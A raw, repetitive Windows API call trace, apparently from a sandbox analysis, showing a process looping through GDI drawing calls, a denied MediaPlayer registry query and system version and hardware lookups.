[0088.146] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.147] BeginPath (hdc=0x0) returned 0 [0088.147] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.147] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.147] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.147] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.147] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.147] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.147] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.147] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.147] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401d0 [0088.147] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401cd [0088.147] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f3f [0088.147] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f40 [0088.147] CombineRgn (hrgnDst=0x1040f3f, hrgnSrc1=0x690401d0, hrgnSrc2=0x6b0401cd, iMode=1) returned 1 [0088.147] CombineRgn (hrgnDst=0x1040f40, hrgnSrc1=0x690401d0, hrgnSrc2=0x6b0401cd, iMode=4) returned 2 [0088.147] CreateSolidBrush (color=0xff) returned 0x2100f3e [0088.147] CreateSolidBrush (color=0xff0000) returned 0x1100f41 [0088.147] DeleteObject (ho=0x1100f41) returned 1 [0088.147] DeleteObject (ho=0x6b0401cd) returned 1 [0088.147] DeleteObject (ho=0x690401d0) returned 1 [0088.147] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.147] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.147] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.147] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.147] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.148] BeginPath (hdc=0x0) returned 0 [0088.148] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.148] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.148] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.148] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.148] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.148] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.148] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.148] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.148] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401cd [0088.148] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401d0 [0088.148] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f42 [0088.148] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f43 [0088.148] CombineRgn (hrgnDst=0x1040f42, hrgnSrc1=0x6c0401cd, hrgnSrc2=0x6a0401d0, iMode=1) returned 1 [0088.148] CombineRgn (hrgnDst=0x1040f43, hrgnSrc1=0x6c0401cd, hrgnSrc2=0x6a0401d0, iMode=4) returned 2 [0088.148] CreateSolidBrush (color=0xff) returned 0x2100f41 [0088.148] CreateSolidBrush (color=0xff0000) returned 0x1100f44 [0088.148] DeleteObject (ho=0x1100f44) returned 1 [0088.148] DeleteObject (ho=0x6a0401d0) returned 1 [0088.148] DeleteObject (ho=0x6c0401cd) returned 1 [0088.148] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.148] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.148] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.148] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.148] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.148] BeginPath (hdc=0x0) returned 0 [0088.148] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.148] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.149] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.149] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.149] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.149] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.149] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6b0401d0 [0088.149] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6d0401cd [0088.149] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f45 [0088.149] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f46 [0088.149] CombineRgn (hrgnDst=0x1040f45, hrgnSrc1=0x6b0401d0, hrgnSrc2=0x6d0401cd, iMode=1) returned 1 [0088.149] CombineRgn (hrgnDst=0x1040f46, hrgnSrc1=0x6b0401d0, hrgnSrc2=0x6d0401cd, iMode=4) returned 2 [0088.149] CreateSolidBrush (color=0xff) returned 0x2100f44 [0088.149] CreateSolidBrush (color=0xff0000) returned 0x1100f47 [0088.149] DeleteObject (ho=0x1100f47) returned 1 [0088.149] DeleteObject (ho=0x6d0401cd) returned 1 [0088.149] DeleteObject (ho=0x6b0401d0) returned 1 [0088.149] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.149] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.149] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.149] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.149] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.149] BeginPath (hdc=0x0) returned 0 [0088.149] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.149] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.149] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.149] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.149] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.150] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.150] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.150] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6e0401cd [0088.150] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6c0401d0 [0088.150] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f48 [0088.150] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f49 [0088.150] CombineRgn (hrgnDst=0x1040f48, hrgnSrc1=0x6e0401cd, hrgnSrc2=0x6c0401d0, iMode=1) returned 1 [0088.150] CombineRgn (hrgnDst=0x1040f49, hrgnSrc1=0x6e0401cd, hrgnSrc2=0x6c0401d0, iMode=4) returned 2 [0088.150] CreateSolidBrush (color=0xff) returned 0x2100f47 [0088.150] CreateSolidBrush (color=0xff0000) returned 0x1100f4a [0088.150] DeleteObject (ho=0x1100f4a) returned 1 [0088.150] DeleteObject (ho=0x6c0401d0) returned 1 [0088.150] DeleteObject (ho=0x6e0401cd) returned 1 [0088.150] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.150] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.150] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.150] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.150] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.150] BeginPath (hdc=0x0) returned 0 [0088.150] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.150] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.150] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.150] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.150] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.150] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.150] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.150] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.151] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401d0 [0088.151] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401cd [0088.151] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f4b [0088.151] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f4c [0088.151] CombineRgn (hrgnDst=0x1040f4b, hrgnSrc1=0x6d0401d0, hrgnSrc2=0x6f0401cd, iMode=1) returned 1 [0088.151] CombineRgn (hrgnDst=0x1040f4c, hrgnSrc1=0x6d0401d0, hrgnSrc2=0x6f0401cd, iMode=4) returned 2 [0088.151] CreateSolidBrush (color=0xff) returned 0x2100f4a [0088.151] CreateSolidBrush (color=0xff0000) returned 0x1100f4d [0088.151] DeleteObject (ho=0x1100f4d) returned 1 [0088.151] DeleteObject (ho=0x6f0401cd) returned 1 [0088.151] DeleteObject (ho=0x6d0401d0) returned 1 [0088.151] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.151] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.151] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.151] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.151] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.151] BeginPath (hdc=0x0) returned 0 [0088.151] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.151] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.151] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.151] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.151] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.151] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.151] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.152] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.152] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401cd [0088.152] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401d0 [0088.152] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f4e [0088.152] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f4f [0088.152] CombineRgn (hrgnDst=0x1040f4e, hrgnSrc1=0x700401cd, hrgnSrc2=0x6e0401d0, iMode=1) returned 1 [0088.152] CombineRgn (hrgnDst=0x1040f4f, hrgnSrc1=0x700401cd, hrgnSrc2=0x6e0401d0, iMode=4) returned 2 [0088.152] CreateSolidBrush (color=0xff) returned 0x2100f4d [0088.152] CreateSolidBrush (color=0xff0000) returned 0x1100f50 [0088.152] DeleteObject (ho=0x1100f50) returned 1 [0088.152] DeleteObject (ho=0x6e0401d0) returned 1 [0088.152] DeleteObject (ho=0x700401cd) returned 1 [0088.152] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.152] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.152] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.152] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.152] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.152] BeginPath (hdc=0x0) returned 0 [0088.152] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.152] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.152] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.152] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.152] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.152] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.153] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.153] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.153] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401d0 [0088.153] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401cd [0088.153] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f51 [0088.153] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f52 [0088.153] CombineRgn (hrgnDst=0x1040f51, hrgnSrc1=0x6f0401d0, hrgnSrc2=0x710401cd, iMode=1) returned 1 [0088.153] CombineRgn (hrgnDst=0x1040f52, hrgnSrc1=0x6f0401d0, hrgnSrc2=0x710401cd, iMode=4) returned 2 [0088.153] CreateSolidBrush (color=0xff) returned 0x2100f50 [0088.153] CreateSolidBrush (color=0xff0000) returned 0x1100f53 [0088.153] DeleteObject (ho=0x1100f53) returned 1 [0088.153] DeleteObject (ho=0x710401cd) returned 1 [0088.153] DeleteObject (ho=0x6f0401d0) returned 1 [0088.153] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.153] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.153] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.153] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.153] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.153] BeginPath (hdc=0x0) returned 0 [0088.153] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.153] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.153] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.153] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.153] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.153] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.153] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.153] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.154] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401cd [0088.154] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401d0 [0088.154] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f54 [0088.154] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f55 [0088.154] CombineRgn (hrgnDst=0x1040f54, hrgnSrc1=0x720401cd, hrgnSrc2=0x700401d0, iMode=1) returned 1 [0088.154] CombineRgn (hrgnDst=0x1040f55, hrgnSrc1=0x720401cd, hrgnSrc2=0x700401d0, iMode=4) returned 2 [0088.154] CreateSolidBrush (color=0xff) returned 0x2100f53 [0088.154] CreateSolidBrush (color=0xff0000) returned 0x1100f56 [0088.154] DeleteObject (ho=0x1100f56) returned 1 [0088.154] DeleteObject (ho=0x700401d0) returned 1 [0088.154] DeleteObject (ho=0x720401cd) returned 1 [0088.154] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.154] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.154] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.154] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.154] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.154] BeginPath (hdc=0x0) returned 0 [0088.154] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.154] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.154] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.154] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.154] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.154] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.154] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.154] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.154] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401d0 [0088.154] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401cd [0088.154] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f57 [0088.154] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f58 [0088.154] CombineRgn (hrgnDst=0x1040f57, hrgnSrc1=0x710401d0, hrgnSrc2=0x730401cd, iMode=1) returned 1 [0088.154] CombineRgn (hrgnDst=0x1040f58, hrgnSrc1=0x710401d0, hrgnSrc2=0x730401cd, iMode=4) returned 2 [0088.154] CreateSolidBrush (color=0xff) returned 0x2100f56 [0088.154] CreateSolidBrush (color=0xff0000) returned 0x1100f59 [0088.155] DeleteObject (ho=0x1100f59) returned 1 [0088.155] DeleteObject (ho=0x730401cd) returned 1 [0088.155] DeleteObject (ho=0x710401d0) returned 1 [0088.155] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.155] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.155] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.155] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.155] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.155] BeginPath (hdc=0x0) returned 0 [0088.155] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.155] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.155] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.155] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.155] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.155] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.155] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.155] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", 